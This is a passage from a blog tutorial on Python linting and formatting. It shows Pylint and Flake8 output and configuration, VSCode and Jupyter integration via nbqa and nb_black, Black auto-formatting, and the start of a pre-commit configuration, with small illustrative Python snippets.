&lt;p&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: In a large coding project consisting of many scripts, it helps to use a consistent style throughout. This can be especially challenging when working with a large team. Incorporating linters into your workflow (pre-commit, etc) will be a big help!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Self-improvement&lt;/strong&gt;: Getting into the habit of regularly checking your code for stylistic errors will make you a better programmer. Over time you will find that you are becoming less reliant on linters!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
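&lt;p&gt;To make the idea of static analysis concrete, the sketch below uses Python&amp;rsquo;s built-in &lt;code&gt;ast&lt;/code&gt; module to spot unused imports in a piece of source code without ever running it. This is only an illustration: the example source string is our own, and real linters perform far more thorough checks than this.&lt;/p&gt;

```python
import ast

source = '''
import numpy as np
import time
import pandas as pd

Captain = "Picard"
print(Captain)
'''

tree = ast.parse(source)  # parse only; the code in `source` is never executed

# Names bound by import statements (using the alias when one is given).
imported = set()
for node in ast.walk(tree):
    if isinstance(node, (ast.Import, ast.ImportFrom)):
        for alias in node.names:
            imported.add(alias.asname or alias.name.split(".")[0])

# Every bare name that is read or written anywhere in the module.
used = {node.id for node in ast.walk(tree) if isinstance(node, ast.Name)}

print(sorted(imported - used))
```

&lt;p&gt;Because the source is only parsed, not executed, it does not matter whether numpy or pandas are installed.&lt;/p&gt;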
&lt;p&gt;This all sounds great!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-python-linting-guide"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="linters-for-python"&gt;Linters for Python&lt;/h2&gt;
&lt;p&gt;We will look at a couple of well-known Python linters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pylint&lt;/strong&gt;: looks for errors, enforces a coding standard that is close to PEP8, and even offers simple refactoring suggestions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flake8&lt;/strong&gt;: wrapper around PyFlakes, pycodestyle and McCabe; this will check Python source code for errors and violations of some of the PEP8 style conventions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It should be noted that Flake8 does not, by default, look for as many PEP8 violations as Pylint (unless you install some plugins). However, it can still be beneficial to work with both linters in your project, as we will show below.&lt;/p&gt;
&lt;h3 id="examples"&gt;Examples&lt;/h3&gt;
&lt;p&gt;So now we know what linters are, let&amp;rsquo;s see how to use them in our projects!&lt;/p&gt;
&lt;h4 id="linting-a-python-script"&gt;Linting a Python script&lt;/h4&gt;
&lt;p&gt;For this example we will look at how to lint the following piece of code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Captain&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Picard&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;InitiateWarpSpeed&lt;/span&gt;(order):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; order&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;engage&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;initiating warp speed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;you are not the captain of this vessel&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;InitiateWarpSpeed(&lt;span style="color:#a5d6ff"&gt;&amp;#34;engage&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;em&gt;&lt;strong&gt;Pylint:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s start with Pylint. We can install this with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install pylint
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Conventionally, Pylint is used to analyse a Python module. However, it is also possible to run it on an individual script with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pylint my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The output looks something like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:13:0: C0304: Final newline missing (missing-final-newline)
my_script.py:1:0: C0114: Missing module docstring (missing-module-docstring)
my_script.py:3:0: E0401: Unable to import &amp;#39;pandas&amp;#39; (import-error)
my_script.py:5:0: C0103: Constant name &amp;#34;Captain&amp;#34; doesn&amp;#39;t conform to UPPER_CASE naming style (invalid-name)
my_script.py:7:0: C0103: Function name &amp;#34;InitiateWarpSpeed&amp;#34; doesn&amp;#39;t conform to snake_case naming style (invalid-name)
my_script.py:7:0: C0116: Missing function or method docstring (missing-function-docstring)
my_script.py:1:0: W0611: Unused numpy imported as np (unused-import)
my_script.py:2:0: W0611: Unused import time (unused-import)
my_script.py:3:0: W0611: Unused pandas imported as pd (unused-import)
my_script.py:2:0: C0411: standard import &amp;#34;import time&amp;#34; should be placed before &amp;#34;import numpy as np&amp;#34; (wrong-import-order)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can see it has flagged some issues with our code. The format with which Pylint displays these messages is:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;{path}:{line}:{column}: {msg_id}: {msg} ({symbol})
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The letter at the start of the message ID indicates the category of the check that has failed. For example, C refers to a convention-related check and E to an error. The full list of categories can be found in the &lt;a href="https://pylint.pycqa.org/en/latest/user_guide/message-control.html" rel="external"&gt;Pylint documentation&lt;/a&gt;. One thing to note is that Pylint is telling us with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:3:0: E0401: Unable to import &amp;#39;pandas&amp;#39; (import-error)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;that there is a bug in line three which will cause an error, and it is telling us this before our code has even run!&lt;/p&gt;
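&lt;p&gt;The message format shown above is regular enough to be picked apart with a few lines of Python. The following is a minimal sketch rather than anything Pylint provides: the helper name &lt;code&gt;parse_pylint_line&lt;/code&gt; and the returned dictionary are our own, and it assumes the path itself contains no colons.&lt;/p&gt;

```python
# Category letters used at the start of Pylint message IDs.
CATEGORIES = {
    "C": "convention",
    "R": "refactor",
    "W": "warning",
    "E": "error",
    "F": "fatal",
    "I": "information",
}


def parse_pylint_line(line):
    """Split one '{path}:{line}:{column}: {msg_id}: {msg} ({symbol})' line into a dict."""
    # Hypothetical helper: assumes the path has no ':' in it.
    path, line_no, column, msg_id, rest = line.split(":", 4)
    msg, _, symbol = rest.strip().rpartition(" (")
    msg_id = msg_id.strip()
    return {
        "path": path,
        "line": int(line_no),
        "column": int(column),
        "msg_id": msg_id,
        "category": CATEGORIES.get(msg_id[0], "unknown"),
        "msg": msg,
        "symbol": symbol.rstrip(")"),
    }


parsed = parse_pylint_line(
    "my_script.py:3:0: E0401: Unable to import 'pandas' (import-error)"
)
print(parsed["category"], parsed["symbol"])
```

&lt;p&gt;Looking up the first letter of the message ID is enough to tell a style convention (C) apart from a genuine error (E).&lt;/p&gt;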
&lt;p&gt;If for some reason we decide we want to overrule Pylint and ignore a message for a line of code, we can include the comment &lt;code&gt;# pylint: disable=some-message&lt;/code&gt;. For example, if we really wanted to keep our naming of variable &lt;code&gt;Captain&lt;/code&gt; against the style guide, we could change the line to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Captain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Picard&amp;#39;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# pylint: disable=invalid-name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So, linting your scripts with Pylint is a breeze, and it turns out Flake8 is just as easy to use!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Flake8:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install flake8
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and run using&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;flake8 my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In fact, you don&amp;rsquo;t even have to specify a Python script here! Simply running &lt;code&gt;flake8&lt;/code&gt; will lint all scripts within the current directory and all sub-directories.&lt;/p&gt;
&lt;p&gt;This time, the output is:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:1:1: F401 &amp;#39;numpy as np&amp;#39; imported but unused
my_script.py:2:1: F401 &amp;#39;time&amp;#39; imported but unused
my_script.py:3:1: F401 &amp;#39;pandas as pd&amp;#39; imported but unused
my_script.py:5:8: E225 missing whitespace around operator
my_script.py:7:1: E302 expected 2 blank lines, found 1
my_script.py:8:13: E225 missing whitespace around operator
my_script.py:13:1: E305 expected 2 blank lines after class or function definition, found 1
my_script.py:13:28: W292 no newline at end of file
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This differs somewhat from the output from Pylint:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Flake8 is flagging lots of issues related to whitespace and blank lines;&lt;/li&gt;
&lt;li&gt;Pylint is identifying violations with naming conventions and layout (docstrings, import order, etc);&lt;/li&gt;
&lt;li&gt;Both linters are pointing out unused imports.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You may prefer one of these linters over the other, or you could be extra-diligent and opt to work with &lt;em&gt;both&lt;/em&gt; linters for your project!&lt;/p&gt;
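&lt;p&gt;For reference, here is one way the example script could be rewritten so that the style messages reported above should no longer apply. Treat it as a sketch: we have simply removed the unused imports, and the docstring wording and new names are our own choices.&lt;/p&gt;

```python
"""Decide whether to initiate warp speed."""

CAPTAIN = "Picard"


def initiate_warp_speed(order):
    """Print a status message depending on the order given."""
    if order == "engage":
        print("initiating warp speed")
    else:
        print("you are not the captain of this vessel")


initiate_warp_speed("engage")
```

&lt;p&gt;The changes are a module docstring, an upper-case constant, a snake_case function name with its own docstring, whitespace around operators, two blank lines around the function and a final newline.&lt;/p&gt;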
&lt;p&gt;If you want Flake8 to ignore a particular line of code, you can just add a comment &lt;code&gt;# noqa&lt;/code&gt; at the end. To ignore a particular error, you can use, for example, &lt;code&gt;# noqa: F401&lt;/code&gt; to ignore an unused import.&lt;/p&gt;
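&lt;p&gt;Placed side by side, the two per-line suppression comments look like this. It is a small illustration based on the example script; each comment is only understood by its own linter.&lt;/p&gt;

```python
# Flake8 skips only the F401 (unused import) check on this line.
import time  # noqa: F401

# Pylint skips only the invalid-name check on this line.
Captain = "Picard"  # pylint: disable=invalid-name
```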
&lt;p&gt;You can also configure Flake8 so that it will only flag particular errors. One way to do this is by adding a setup.cfg file to your working directory. Let&amp;rsquo;s say you want to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;set the maximum line length to be 88;&lt;/li&gt;
&lt;li&gt;ignore the E302 blank line flags;&lt;/li&gt;
&lt;li&gt;ignore the F401 flag for my_script.py only.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The contents of setup.cfg would then be:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[flake8]
max-line-length = 88
extend-ignore =
    E302,
per-file-ignores =
    my_script.py:F401
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Running Flake8 then gives a reduced output:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:5:8: E225 missing whitespace around operator
my_script.py:8:13: E225 missing whitespace around operator
my_script.py:13:1: E305 expected 2 blank lines after class or function definition, found 1
my_script.py:13:28: W292 no newline at end of file
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="linting-in-an-editor"&gt;Linting in an editor&lt;/h4&gt;
&lt;p&gt;In the last example we showed how to lint Python scripts from the command line. However, we might want to see potential issues with our code as we are writing it, enabling us to correct things instantly. In order to do this we can configure a linter with a text editor. In this example we will go through how to do this for VSCode.&lt;/p&gt;
&lt;p&gt;In VSCode we can set our linter preference by opening the command palette with &lt;code&gt;Ctrl+Shift+P&lt;/code&gt; and clicking on &lt;code&gt;Python: Select Linter&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can then select which linter we want to use. If &amp;lsquo;Pylint&amp;rsquo; is selected, for example, the setting&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;#34;python.linting.pylintEnabled&amp;#34;: true
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;will then be added to the &lt;code&gt;settings.json&lt;/code&gt; file in the &lt;code&gt;.vscode&lt;/code&gt; config.&lt;/p&gt;
&lt;p&gt;Potential issues will now be underlined upon saving our script, similar to a spell checker:&lt;/p&gt;
&lt;p&gt;&lt;img alt="linted code" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-linting-guide/code_snapshot.png" width="724"&gt;&lt;/p&gt;
&lt;p&gt;If you hover over a line, the message associated with this problem will be displayed. The full list of issues can also be viewed in the &amp;ldquo;PROBLEMS&amp;rdquo; bar of the VSCode terminal window.&lt;/p&gt;
&lt;h4 id="linting-a-jupyter-notebook"&gt;Linting a Jupyter Notebook&lt;/h4&gt;
&lt;p&gt;Jupyter notebooks can be a great tool for learning, running experiments and checking pieces of code. However, they do pose some difficulties when it comes to version control and running checks such as linting and formatting.&lt;/p&gt;
&lt;p&gt;An easy way to apply linters to Jupyter notebooks is with the &lt;strong&gt;nbqa&lt;/strong&gt; package. This can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install nbqa
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;or&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;conda install -c conda-forge nbqa
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This enables you to then run a range of code styling tools on notebooks in a similar way to scripts. For example, to use Pylint on a notebook you simply have to run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;nbqa pylint my_notebook.ipynb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Note, you will need to separately install any tool you want to use with nbqa.&lt;/p&gt;
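&lt;p&gt;Why is an extra tool needed at all? A notebook is stored as JSON, with the code split across cells, so a linter cannot read it directly. The sketch below is not how nbqa is implemented; it only illustrates the idea by pulling the code cells out of a tiny, made-up notebook using the standard library.&lt;/p&gt;

```python
import json

# A tiny notebook in the .ipynb JSON layout (nbformat 4), built inline for illustration.
notebook_json = json.dumps(
    {
        "nbformat": 4,
        "nbformat_minor": 5,
        "metadata": {},
        "cells": [
            {"cell_type": "markdown", "metadata": {}, "source": ["# Warp drive"]},
            {
                "cell_type": "code",
                "metadata": {},
                "execution_count": None,
                "outputs": [],
                "source": ["Captain='Picard'\n", "print(Captain)"],
            },
        ],
    }
)


def extract_code(notebook_text):
    """Return the source of every code cell, joined into one script-like string."""
    notebook = json.loads(notebook_text)
    cells = [
        "".join(cell["source"])
        for cell in notebook["cells"]
        if cell["cell_type"] == "code"
    ]
    return "\n\n".join(cells)


print(extract_code(notebook_json))
```

&lt;p&gt;The resulting text is ordinary Python, which is the kind of input that Pylint or Flake8 expects.&lt;/p&gt;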
&lt;h2 id="auto-formatters-in-python"&gt;Auto-formatters in Python&lt;/h2&gt;
&lt;p&gt;Linters are perfectly fine for dealing with imperfections for which there is a clear and simple fix, like renaming a variable from &lt;code&gt;CamelCase&lt;/code&gt; to &lt;code&gt;snake_case&lt;/code&gt;. But they would not be able to, for example, split a long line of code into several shorter lines. Instead, this can be done with an auto-formatter, which can change your code to follow certain formatting guidelines. These guidelines dictate things such as where tabs, spaces and new lines are used in code.&lt;/p&gt;
&lt;p&gt;We will consider a popular auto-formatter called &lt;strong&gt;Black&lt;/strong&gt;. Black reformats entire files in place, applying its own PEP8-compliant coding style which is detailed &lt;a href="https://black.readthedocs.io/en/stable/the_black_code_style/current_style.html" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="examples-1"&gt;Examples&lt;/h3&gt;
&lt;h4 id="formatting-a-python-script"&gt;Formatting a Python script&lt;/h4&gt;
&lt;p&gt;Black can be installed by running&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and run with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;black my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Let&amp;rsquo;s say your script contains a long line of code, like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;long_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#39;this&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;list&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;contains&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;too&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;many&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;elements&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;for&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;one&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;line&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Black will change this to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;long_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;this&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;list&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;contains&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;too&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;many&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;elements&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;for&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;one&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can see the list has been split up so each element is on a different line, making it easier to read. Furthermore, the single quotation marks have been changed to more conventional double quotations.&lt;/p&gt;
&lt;p&gt;It should be noted that Black will only change the appearance/formatting of your code. It will not, for example, flag possible errors or remind you to put in a docstring.&lt;/p&gt;
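&lt;p&gt;One way to convince yourself that only the appearance has changed is to compare the syntax trees of the two versions of the list. The sketch below does this with the standard-library &lt;code&gt;ast&lt;/code&gt; module; the variable names are our own, and it is an illustration of the idea rather than a description of how Black itself works.&lt;/p&gt;

```python
import ast

before = "long_list = ['this','list','contains','too','many','elements','for','one','line']"

after = """long_list = [
    "this",
    "list",
    "contains",
    "too",
    "many",
    "elements",
    "for",
    "one",
    "line",
]
"""

# ast.dump ignores whitespace, line breaks and quote style, so equal dumps
# mean the two snippets are the same program.
same_program = ast.dump(ast.parse(before)) == ast.dump(ast.parse(after))
print(same_program)
```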
&lt;h4 id="auto-formatting-a-jupyter-notebook"&gt;Auto-formatting a Jupyter notebook&lt;/h4&gt;
&lt;p&gt;To format a notebook using Black you can again use the nbqa package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;nbqa black my_notebook.ipynb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can also integrate Black with Jupyter notebooks using the Black notebook extension, &lt;strong&gt;nb_black&lt;/strong&gt;. You can install this with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install nb_black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and then use it in a Jupyter notebook by running the following magic command in a cell:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-ipython" data-lang="ipython"&gt;%load_ext nb_black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now, whenever we run a code block it will be formatted with the Black style guide!&lt;/p&gt;
&lt;p&gt;If you want to have Black formatting enabled in your notebooks automatically (i.e. without having to run the magic command) you can set this in the ipython config. You can create an initial template ipython config by running:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ipython profile create
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This by default should create some config files at the location &lt;code&gt;~/.ipython/profile_default/&lt;/code&gt;. In the &lt;code&gt;ipython_config.py&lt;/code&gt; file you then need to add the lines,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_config()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;InteractiveShellApp&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;extensions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;nb_black&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Black formatting will now be enabled automatically whenever you use a Jupyter notebook.&lt;/p&gt;
&lt;h2 id="pre-commit-hooks"&gt;Pre-commit hooks&lt;/h2&gt;
&lt;p&gt;So, we now know how to use linters and auto-formatters, and we have realised just how useful these are! The next step is to start enforcing their use in our projects. This can be done using pre-commit hooks. Pre-commit hooks enable us to check our code for style and formatting issues each time a change is committed, thus ensuring a uniform style is maintained throughout the entirety of a project.&lt;/p&gt;
&lt;p&gt;The pre-commit package manager can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install pre-commit
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the root of our Git repository, we then need to create a file called &lt;code&gt;.pre-commit-config.yaml&lt;/code&gt;. This file is where we will specify the checks we want to run before each commit. Below is an example which uses some hooks from the pre-commit-hooks &lt;a href="https://pre-commit.com/hooks.html" rel="external"&gt;repo&lt;/a&gt; as well as Black formatting.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;repos&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/pre-commit/pre-commit-hooks&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;v3.2.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;- &lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;trailing-whitespace&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;    &lt;/span&gt;- &lt;span style="color:#6e7681"&gt;  &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;end-of-file-fixer&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
